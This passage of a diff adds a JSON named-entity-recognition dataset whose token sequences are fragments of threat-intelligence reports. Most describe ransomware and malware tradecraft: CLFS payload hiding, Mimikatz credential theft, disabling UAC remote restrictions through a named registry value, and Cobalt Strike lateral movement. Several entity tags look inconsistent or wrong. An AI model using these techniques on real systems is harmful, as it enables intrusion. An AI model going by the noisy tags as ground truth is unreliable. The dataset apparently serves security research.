"tokens": [ + "This", + "enables", + "the", + "document", + "to", + "fetch", + "the", + ".dotm", + "file", + "from", + "the", + "remote", + "server", + "required", + "for", + "further", + "actions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Upon", + "opening", + "the", + "malicious", + "document" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "obfuscated", + "VBA", + "macro" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "Windows", + "Registry", + "or", + "NTFS", + "Extended", + "Attributes", + "to", + "hide", + "their", + "data," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hide", + "a", + "second", + "stage", + "payload", + "in", + "registry", + "transaction", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "perform", + "a", + "number", + "of", + "changes", + "on", + "the", + "filesystem", + "or", + "registry," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "store", + "and", + "retrieve", + "binary", + "data", + "with", + "the", + "Windows", + "API." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "provides", + "applications", + "with", + "API", + "functions—available" + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "accessible", + "through", + "API", + "functions." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "opened", + "with", + "the", + "CreateLogFile()", + "API" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "clfsw32.dll", + "API", + "function" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "function", + "is", + "patched", + "using", + "Microsoft", + "Detours—a", + "publicly", + "available", + "library", + "used", + "for", + "instrumenting", + "Win32", + "functions—so" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "resolves", + "the", + "function", + "address", + "for", + "the", + "ServiceMain", + "export", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "the", + "API", + "CreateFileTransactedA()" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "via", + "the", + "API", + "NtCreateSection()" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malware", + "Obfuscation" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "most", + "of", + "the", + "strings", + "used", + "by", + "PRIVATELOG", + "and", + "STASHLOG", + "are", + "obfuscated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "each", + "string", + "is", + "therefore", + "encrypted", + "with", + "a", + "unique", + "byte", + "stream." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "relies", + "on", + "XOR’ing", + "each", + "byte", + "with", + "a", + "hard-coded" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "control", + "flow", + "obfuscation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "addition", + "to", + "containing", + "obfuscated", + "strings,", + "the", + "installer’s", + "code", + "is", + "protected", + "using", + "various", + "control", + "flow", + "obfuscation", + "techniques", + "that", + "make", + "static", + "analysis", + "cumbersome" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "installer", + "generates", + "and", + "prints", + "out", + "encryption", + "keys", + "that", + "the", + "actor", + "uses", + "to", + "pre-encrypt", + "the", + "payload", + "before", + "it", + "is", + "written", + "to", + "disk" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Following", + "the", + "payload", + "header,", + "the", + "malware", + "expects", + "blocks", + "of", + "encrypted", + "data", + "with", + "8-byte", + "headers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Each", + "block", + "is", + "then", + "re-encrypted", + "with", + "the", + "new", + "key", + "material", + "as", + "follows:", + "The", + "encryption", + "key", + "is", + "the", + "16-byte", + "GUID" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "encryption", + "algorithm", + "is", + "HC-128," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Sample", + "string", + "deobfuscation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "some", + "of", + "the", + "deobfuscated", + "strings", + "from", + "the", + "installer", + "are", + "used", + "for", + "logging", + "error", + "messages", + "and" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "the", + "installer", + "opens", + "and", + "decrypts", + "the", + "contents", + "of", + "the", + "file", + "passed", + "as", + "an", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "file", + "contents" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "data", + "matches", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "decrypts", + "each", + "block", + "using", + "HC-128" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "payload", + "which", + "will", + "be", + "decrypted." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "its", + "contents", + "are", + "decrypted", + "using", + "the", + "HC-128", + "encryption", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "key", + "and", + "IV", + "are", + "generated", + "using", + "the", + "same", + "unique", + "host", + "properties" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "only", + "decrypts", + "the", + "first", + "matching", + "block" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "payload", + "contents" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "file", + "that", + "should", + "be", + "hidden", + "in", + "a", + "CLFS", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "it", + "searches", + "for", + ".blf", + "files", + "in", + "the", + "default", + "user’s", + "profile", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "starts", + "by", + "enumerating", + "*.blf", + "files", + "in", + "the", + "default", + "user’s", + "profile", + "directory" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "also", + "checks", + "that", + "the", + "operating", + "system", + "version" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "injection", + "process" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "example,", + "to", + "open", + "a", + "registry", + "key", + "in", + "a", + "transaction,", + "the", + "functions", + "RegCreateKeyTransacted(),", + "RegOpenKeyTransacted(),", + "and", + "RegDeleteKeyTransacted()", + "are", + "available." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "GUID", + "returned", + "from", + "the", + "registry", + "value" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "to", + "steal", + "credentials", + "from", + "host", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Uses", + "Mimikatz", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "them", + "locally." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "decrypted," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "begins", + "to", + "decrypt", + "and", + "parse", + "its", + "embedded", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "the", + "rest", + "of", + "the", + "blob", + "once", + "it", + "has", + "been", + "decoded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "REvil", + "configuration", + "has", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypted", + "REvil", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "Ransom", + "Cartel", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "are", + "written", + "to", + "the", + "registry," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "is", + "written", + "to", + "the", + "registry", + "key", + "SOFTWARE\\\\Google_Authenticator\\\\b52dKMhj," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "data", + "has", + "been", + "written", + "to", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "within", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Modifies", + "the", + "Registry", + "to", + "disable", + "UAC", + "remote", + "restrictions", + "by", + "setting", + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", + "to", + "1." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "first", + "checks", + "to", + "see", + "if", + "the", + "registry", + "already", + "contains", + "previously", + "generated", + "values;", + "if", + "so,", + "it", + "will", + "read", + "those", + "values", + "into", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "command", + "line", + "provided", + "to", + "the", + "ransomware", + "is", + "parsed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Uses", + "cmd.exe", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "disable", + "UAC", + "remote", + "restrictions", + "by", + "setting", + "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", + "to", + "1." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Adds", + "registry", + "run", + "keys", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "and", + "install", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "retrieve", + "the", + "malicious", + "payload", + "and", + "download", + "additional", + "resources" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "Downloads", + "and", + "uploads", + "files", + "to", + "and", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "tool", + "downloads", + "the", + "files" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Uses", + "legitimate", + "VPN,", + "RDP,", + "Citrix", + "or", + "VNC", + "credentials", + "to", + "maintain", + "access", + "to", + "an", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deploys", + "PDQ", + "Inventory", + "Scanner", + "tool." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "a", + "cracked", + "version", + "of", + "a", + "legitimate", + "tool", + "called", + "PDQ", + "Inventory,", + "which", + "is", + "a", + "legitimate", + "system", + "management", + "solution", + "that", + "IT", + "administrators", + "use", + "to", + "scan", + "their", + "network", + "and", + "collect", + "hardware,", + "software", + "and", + "Windows", + "configuration", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "enable", + "offline", + "password", + "cracking." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uses", + "Rundll32", + "to", + "load", + "and", + "execute", + "malicious", + "DLL." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "ransomware", + "will", + "proceed", + "to", + "spawn", + "another", + "instance", + "of", + "itself", + "via", + "rundll32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Deletes", + "some", + "of", + "its", + "files", + "used", + "during", + "operations", + "as", + "part", + "of", + "cleanup,", + "including", + "removing", + "applications", + "such", + "as", + "7z.exe,", + "tor.exe,", + "ssh.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Uses", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "utilizing", + "string", + "encryption" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "configuration" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "base64-encoded", + "ransom", + "note," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "configuration", + "is", + "stored", + "as", + "a", + "base64-encoded", + "blob,", + "whereby", + "the", + "first", + "16", + "bytes", + "of", + "the", + "base64-encoded", + "blob", + "is", + "the", + "RC4", + "key" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "opts", + "to", + "obfuscate", + "their", + "ransomware", + "much", + "more", + "heavily" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Searches", + "for", + "specific", + "files", + "prior", + "to", + "encryption." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "seeks", + "out", + "files", + "with", + "the", + "following", + "file", + "extensions:", + ".log,", + ".vmdk,", + ".vmem,", + ".vswp", + "and", + ".vmsn." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Target", + "specific", + "file", + "path" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "search", + "machines", + "for", + "certain", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uses", + "AnyDesk", + "to", + "remotely", + "connect", + "and", + "transfer", + "files." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "used", + "this", + "as", + "a", + "remote", + "access", + "tool", + "to", + "establish", + "an", + "interactive", + "command", + "and", + "control", + "channel" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Routes", + "traffic", + "over", + "TOR", + "and", + "VPN", + "servers", + "to", + "obfuscate", + "their", + "activities." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "TOR", + "sites", + "redirecting", + "to", + "a", + "new", + "ransomware", + "operation" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "API", + "hashing" + ], + "ner_tags": [ + "B-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "the", + "username" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "computer", + "name,", + "domain", + "name,", + "locale", + "and", + "product", + "name." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "leads", + "to", + "a", + "function", + "that", + "iterates", + "over", + "a", + "call" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes", + "the", + "batch", + "file," + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "a", + "batch", + "script", + "used" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "batch", + "files" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "new", + "batch", + "file,", + "localdisk.bat,", + "was", + "also", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "discovery", + "actions", + "were", + "completed", + "several", + "times", + "again", + "in", + "other", + "various", + "batch", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "was", + "executed", + "using", + "a", + "command", + "line", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "batch", + "file." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "execution", + "of", + "the", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file", + "eyewear.bat", + "then", + "executed", + "two", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/c" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/c" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "enter", + "this", + "directly", + "in", + "the", + "host", + "OS", + "command", + "shell." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + ":\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "invoked", + "from", + "the", + "command", + "line" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Another", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "leveraged", + "by", + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\cmd.exe", + "/C" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "command", + "line" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "dropped", + "several", + "batch", + "scripts", + "on", + "the", + "server:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd.exe", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd.exe", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd.exe", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "installed", + "Atera", + "and", + "Splashtop", + "remote", + "access", + "software" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "then", + "repeated", + "the", + "install", + "of", + "the", + "remote", + "access", + "software", + "package." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "installed", + "RSAT", + "(Remote", + "Server", + "Administration", + "Tools)", + "on", + "the", + "beachhead", + "host" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AnyDesk", + "was", + "used", + "to", + "move", + "laterally", + "between", + "a", + "workstation", + "and", + "a", + "backup", + "server" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "three", + "different", + "Remote", + "Access", + "Software", + "were", + "used", + "by", + "the", + "threat", + "actor" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "used", + "three", + "different", + "tools", + "in", + "order", + "to", + "establish", + "an", + "interactive", + "and", + "persistent", + "command", + "and", + "control", + "channel." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "installation", + "of", + "the", + "remote", + "management", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "began", + "their", + "first", + "lateral", + "movement", + "to", + "a", + "server", + "in", + "the", + "environment", + "by", + "copying", + "their", + "Cobalt", + "Strike", + "DLL", + "over", + "to", + "the", + "host", + "and", + "executing", + "it" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "O", 